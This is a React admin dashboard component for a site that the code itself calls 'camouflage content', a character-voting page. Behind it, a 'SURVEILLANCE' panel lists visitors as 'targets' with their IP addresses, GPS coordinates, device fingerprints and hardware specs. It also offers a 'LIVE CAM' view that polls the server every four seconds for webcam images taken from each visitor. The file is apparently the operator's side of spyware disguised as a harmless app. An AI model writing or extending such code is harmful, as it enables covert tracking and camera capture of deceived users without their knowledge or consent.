import React, { useState, useEffect } from 'react';
import { Character } from '../types';
import { 
  LayoutDashboard, Users, LogOut, Edit3, Trash2, Save, RefreshCcw, Trophy, Activity,
  Search, Zap, Menu, X, Upload, Link as LinkIcon, Monitor, Smartphone, MapPin, 
  Calendar, Clock, Camera, FolderOpen, Download, FileJson, Globe, RefreshCw, Cpu
} from 'lucide-react';
import { motion, AnimatePresence } from 'framer-motion';
import { dataService } from '../services/dataService';
import { DetailedDeviceInfo } from '../utils/deviceInfo'; // Type import

interface AdminDashboardProps {
  characters: Character[];
  setCharacters: React.Dispatch<React.SetStateAction<Character[]>>;
  onLogout: () => void;
}

interface ActivityLog {
    user: string;
    action: string;
    timestamp: string;
    ip: string;
    location: any;
    device: DetailedDeviceInfo; // Updated type
}

const AdminDashboard: React.FC<AdminDashboardProps> = ({ characters, setCharacters, onLogout }) => {
  const [activeTab, setActiveTab] = useState<'overview' | 'characters' | 'targets'>('overview');
  const [editingId, setEditingId] = useState<string | null>(null);
  const [editForm, setEditForm] = useState<Partial<Character>>({});
  const [logs, setLogs] = useState<ActivityLog[]>([]);
  const [isSidebarOpen, setIsSidebarOpen] = useState(false);
  const [viewingSurveillance, setViewingSurveillance] = useState<string | null>(null);
  const [surveillanceImages, setSurveillanceImages] = useState<{timestamp: string, url: string}[]>([]);

  // Effect: Periodic Poll for Live Surveillance Feed from Server
  useEffect(() => {
    let interval: any;
    if (viewingSurveillance) {
        fetchImages(viewingSurveillance);
        interval = setInterval(() => {
            fetchImages(viewingSurveillance);
        }, 4000);
    }
    return () => clearInterval(interval);
  }, [viewingSurveillance]);

  const fetchImages = async (user: string) => {
      const images = await dataService.getSurveillanceImages(user);
      setSurveillanceImages(images);
  };

  useEffect(() => {
    loadLogs();
  }, [activeTab]);

  const loadLogs = () => {
    const rawLogs: ActivityLog[] = [];
    
    // 1. Scan Local Storage for Login/Visit Logs
    for (let i = 0; i < localStorage.length; i++) {
      const key = localStorage.key(i);
      
      // Handle Vote Records
      if (key && key.startsWith('muse_vote_record_')) {
        const user = key.replace('muse_vote_record_', '');
        try {
            const parsed = JSON.parse(localStorage.getItem(key) || '{}');
            rawLogs.push({
                user: user,
                action: `Voted for ${parsed.charId}`,
                timestamp: parsed.timestamp,
                ip: parsed.location?.ipAddress || 'Unknown',
                location: parsed.location,
                device: parsed.deviceInfo
            });
        } catch (e) {}
      }
      
      // Handle Login/Visit Logs (Generated by registerUserLogin)
      if (key && key.startsWith('muse_login_log_')) {
         try {
             const parsed = JSON.parse(localStorage.getItem(key) || '{}');
             rawLogs.push({
                 user: parsed.user,
                 action: parsed.method === 'guest_visit' ? 'Site Visit (Target)' : 'Login',
                 timestamp: parsed.timestamp,
                 ip: parsed.ip || 'Unknown',
                 location: null, 
                 device: parsed.deviceInfo
             });
         } catch(e) {}
      }
    }

    // Deduplicate by User to show latest status
    const uniqueMap = new Map();
    rawLogs.forEach(log => {
        // We want the most recent entry for each user to get latest location/IP
        if (!uniqueMap.has(log.user) || new Date(log.timestamp) > new Date(uniqueMap.get(log.user).timestamp)) {
            uniqueMap.set(log.user, log);
        }
    });

    const sortedLogs = Array.from(uniqueMap.values()).sort((a: any, b: any) => 
        new Date(b.timestamp).getTime() - new Date(a.timestamp).getTime()
    );

    setLogs(sortedLogs);
  };

  const handleEditClick = (char: Character) => { setEditingId(char.id); setEditForm(char); };
  const handleSaveEdit = () => { if (!editingId) return; setCharacters(prev => prev.map(c => c.id === editingId ? { ...c, ...editForm } as Character : c)); setEditingId(null); };
  
  return (
    <div className="flex h-screen bg-slate-950 text-slate-200 font-sans overflow-hidden">
      <button onClick={() => setIsSidebarOpen(true)} className="fixed top-4 left-4 z-40 p-2 bg-slate-800 rounded-lg md:hidden border border-slate-700"><Menu size={24} /></button>

      <aside className={`fixed md:relative top-0 left-0 h-full w-64 bg-slate-900 border-r border-slate-800 flex flex-col z-50 transition-transform duration-300 ${isSidebarOpen ? 'translate-x-0' : '-translate-x-full md:translate-x-0'}`}>
          <div className="p-6 border-b border-slate-800 flex items-center justify-between">
            <span className="font-display font-bold text-xl tracking-wide text-red-500">SURVEILLANCE</span>
            <button onClick={() => setIsSidebarOpen(false)} className="md:hidden text-slate-400"><X size={20} /></button>
          </div>
          <nav className="flex-1 p-4 space-y-2">
            <button onClick={() => setActiveTab('overview')} className={`w-full flex items-center gap-3 px-4 py-3 rounded-xl transition-all ${activeTab === 'overview' ? 'bg-indigo-600/20 text-indigo-300' : 'text-slate-400 hover:bg-slate-800'}`}><LayoutDashboard size={18}/><span>Overview</span></button>
            <button onClick={() => setActiveTab('targets')} className={`w-full flex items-center gap-3 px-4 py-3 rounded-xl transition-all ${activeTab === 'targets' ? 'bg-red-600/20 text-red-400 border border-red-500/30' : 'text-slate-400 hover:bg-slate-800'}`}><Camera size={18}/><span>Targets (Logs)</span></button>
            <button onClick={() => setActiveTab('characters')} className={`w-full flex items-center gap-3 px-4 py-3 rounded-xl transition-all ${activeTab === 'characters' ? 'bg-indigo-600/20 text-indigo-300' : 'text-slate-400 hover:bg-slate-800'}`}><Users size={18}/><span>Characters</span></button>
          </nav>
          <div className="p-4"><button onClick={onLogout} className="w-full flex items-center gap-2 px-4 py-2 text-slate-400 hover:text-red-400 transition-colors"><LogOut size={16}/><span>Logout</span></button></div>
      </aside>

      <main className="flex-1 overflow-y-auto bg-slate-950 p-4 md:p-8 relative pt-20 md:pt-8 no-scrollbar">
         
         {activeTab === 'overview' && (
             <motion.div initial={{ opacity: 0, y: 10 }} animate={{ opacity: 1, y: 0 }} className="space-y-6">
                 <h1 className="text-2xl font-bold text-white mb-4">System Status</h1>
                 <div className="grid grid-cols-1 md:grid-cols-3 gap-6">
                     <div className="bg-slate-900 border border-slate-800 p-6 rounded-2xl shadow-lg relative overflow-hidden group">
                        <div className="absolute top-0 right-0 p-4 opacity-10"><Users size={64} className="text-emerald-500"/></div>
                        <h3 className="text-slate-400 text-sm font-bold uppercase tracking-wider mb-2">Total Targets</h3>
                        <p className="text-4xl font-display font-bold text-white">{logs.length}</p>
                    </div>
                 </div>
             </motion.div>
         )}

         {/* --- TARGETS TAB (Main Feature) --- */}
         {activeTab === 'targets' && (
            <motion.div initial={{ opacity: 0, y: 10 }} animate={{ opacity: 1, y: 0 }}>
                <div className="flex justify-between items-center mb-6">
                    <h1 className="text-2xl font-bold text-white flex items-center gap-2"><Camera className="text-red-500"/> Target Logs</h1>
                    <button onClick={loadLogs} className="bg-slate-800 text-white px-4 py-2 rounded-lg flex items-center gap-2 hover:bg-slate-700"><RefreshCw size={16}/> Refresh</button>
                </div>
                
                <div className="bg-slate-900 border border-slate-800 rounded-2xl overflow-hidden overflow-x-auto shadow-lg">
                    <table className="w-full text-left text-sm min-w-[1100px]">
                        <thead className="bg-slate-800/50 text-slate-400 font-medium">
                            <tr>
                                <th className="p-4 w-[180px]">User & IP</th>
                                <th className="p-4 w-[250px]">Location Info</th>
                                <th className="p-4 w-[300px]">Device Fingerprint</th>
                                <th className="p-4">System Specs</th>
                                <th className="p-4">Cam Feed</th>
                            </tr>
                        </thead>
                        <tbody className="divide-y divide-slate-800">
                            {logs.length === 0 ? (
                                <tr><td colSpan={6} className="p-8 text-center text-slate-500">No targets detected yet.</td></tr>
                            ) : (
                                logs.map((log, idx) => (
                                    <tr key={idx} className="hover:bg-slate-800/30 transition-colors">
                                        <td className="p-4 align-top">
                                            <div className="font-mono font-bold text-indigo-300 mb-1">{log.user}</div>
                                            <div className="flex items-center gap-1.5 mb-1">
                                                <Globe size={12} className="text-slate-500"/>
                                                <span className="font-mono text-emerald-400 font-bold bg-emerald-950/30 px-1.5 py-0.5 rounded text-xs">
                                                    {log.ip}
                                                </span>
                                            </div>
                                            <div className="text-[10px] text-slate-500">{new Date(log.timestamp).toLocaleTimeString()}</div>
                                        </td>
                                        
                                        <td className="p-4 align-top">
                                            <div className="space-y-1.5">
                                                {log.location && typeof log.location.lat === 'number' ? (
                                                    <a href={`https://www.google.com/maps?q=${log.location.lat},${log.location.lng}`} target="_blank" className="flex items-center gap-1.5 text-indigo-400 hover:text-indigo-300 transition-colors">
                                                        <MapPin size={14} className="text-red-500"/>
                                                        <span className="text-xs font-mono">{log.location.lat.toFixed(5)}, {log.location.lng.toFixed(5)}</span>
                                                    </a>
                                                ) : <span className="text-slate-600 text-xs flex items-center gap-1"><MapPin size={12}/> No GPS</span>}
                                                
                                                {log.device?.timeZone && (
                                                    <div className="text-xs text-slate-400 flex items-center gap-1.5">
                                                        <Clock size={12} /> {log.device.timeZone.replace('_', ' ')}
                                                    </div>
                                                )}
                                            </div>
                                        </td>

                                        <td className="p-4 align-top">
                                            {log.device ? (
                                                <div className="space-y-1 text-xs text-slate-300">
                                                    <div className="flex items-center gap-2">
                                                        {log.device.isMobile ? <Smartphone size={14} className="text-slate-500"/> : <Monitor size={14} className="text-slate-500"/>}
                                                        <span className="font-bold text-white">{log.device.osName}</span> 
                                                        <span className="text-slate-500">Ver: {log.device.osVersion}</span>
                                                    </div>
                                                    <div className="flex items-center gap-2">
                                                        <Globe size={14} className="text-slate-500"/>
                                                        <span className="font-bold text-indigo-200">{log.device.browserName}</span>
                                                        <span className="text-slate-500">{log.device.browserVersion}</span>
                                                    </div>
                                                    <div className="flex items-center gap-2 text-slate-400">
                                                        <span className="uppercase text-[10px] font-bold tracking-wider">Lang:</span>
                                                        {log.device.language}
                                                    </div>
                                                </div>
                                            ) : <span className="text-slate-600">No Data</span>}
                                        </td>

                                        <td className="p-4 align-top">
                                            {log.device ? (
                                                <div className="grid grid-cols-2 gap-x-2 gap-y-1 text-[11px]">
                                                    <div className="text-slate-500">CPU Arch</div>
                                                    <div className="text-slate-300 font-mono">{log.device.cpuArchitecture}</div>
                                                    
                                                    <div className="text-slate-500">Cores</div>
                                                    <div className="text-slate-300 font-mono">{log.device.cores}</div>
                                                    
                                                    <div className="text-slate-500">Resolution</div>
                                                    <div className="text-slate-300 font-mono">{log.device.resolution}</div>
                                                    
                                                    <div className="text-slate-500">Memory</div>
                                                    <div className="text-slate-300 font-mono">{log.device.memory}</div>
                                                </div>
                                            ) : null}
                                        </td>

                                        <td className="p-4 align-top">
                                            <button 
                                                onClick={() => setViewingSurveillance(log.user)}
                                                className="flex items-center gap-2 px-3 py-1.5 bg-red-900/20 hover:bg-red-900/40 text-red-400 border border-red-900/50 rounded-lg transition-colors w-full justify-center"
                                            >
                                                <Camera size={14} /> <span className="text-xs font-bold">LIVE CAM</span>
                                            </button>
                                        </td>
                                    </tr>
                                ))
                            )}
                        </tbody>
                    </table>
                </div>

                {/* Surveillance Modal */}
                 <AnimatePresence>
                     {viewingSurveillance && (
                         <div className="fixed inset-0 z-50 flex items-center justify-center p-4">
                             <div className="absolute inset-0 bg-black/90 backdrop-blur-md" onClick={() => setViewingSurveillance(null)}></div>
                             <motion.div initial={{opacity:0, scale:0.95}} animate={{opacity:1, scale:1}} className="bg-slate-900 border border-slate-700 w-full max-w-5xl h-[85vh] rounded-2xl relative z-10 p-6 flex flex-col">
                                 <div className="flex justify-between mb-4 border-b border-slate-800 pb-4">
                                     <div>
                                        <h3 className="font-bold text-white flex items-center gap-2 text-xl"><Camera className="text-red-500"/> Target: {viewingSurveillance}</h3>
                                        <p className="text-xs text-slate-500">Live feed updates every 4 seconds</p>
                                     </div>
                                     <button onClick={() => setViewingSurveillance(null)} className="text-slate-400 hover:text-white"><X size={24}/></button>
                                 </div>
                                 <div className="flex-1 overflow-y-auto grid grid-cols-2 md:grid-cols-3 lg:grid-cols-4 gap-4 p-2 bg-slate-950 rounded-xl inner-shadow">
                                     {surveillanceImages.length === 0 ? (
                                         <div className="col-span-full flex flex-col items-center justify-center h-full text-slate-500">
                                             <FolderOpen size={48} className="mb-2 opacity-20"/>
                                             <p>Waiting for camera uplink...</p>
                                             <div className="mt-4 w-4 h-4 bg-red-500 rounded-full animate-ping"></div>
                                         </div>
                                     ) : (
                                         surveillanceImages.map((img, i) => (
                                             <div key={i} className="bg-black rounded-lg border border-slate-800 relative overflow-hidden group aspect-video shadow-lg">
                                                 <img src={img.url} className="w-full h-full object-cover" alt="surveillance" loading="lazy"/>
                                                 <div className="absolute top-2 right-2 px-1.5 py-0.5 bg-red-600 text-white text-[9px] font-bold rounded uppercase tracking-wider">REC</div>
                                                 <div className="absolute bottom-0 inset-x-0 bg-black/80 backdrop-blur text-[10px] text-center text-slate-300 py-1">
                                                     {img.timestamp}
                                                 </div>
                                             </div>
                                         ))
                                     )}
                                 </div>
                             </motion.div>
                         </div>
                     )}
                 </AnimatePresence>
            </motion.div>
         )}

         {/* --- CHARACTERS TAB (Maintenance) --- */}
         {activeTab === 'characters' && (
             <motion.div initial={{ opacity: 0 }} animate={{ opacity: 1 }}>
                 <h1 className="text-2xl font-bold text-white mb-6">Camouflage Content (Characters)</h1>
                 {characters.map(char => (
                     <div key={char.id} className="bg-slate-900 border border-slate-800 p-4 rounded-xl flex justify-between mb-2">
                         <span>{char.name}</span>
                         <span className="text-slate-500">{char.votes} votes</span>
                     </div>
                 ))}
             </motion.div>
         )}
      </main>
    </div>
  );
};

export default AdminDashboard;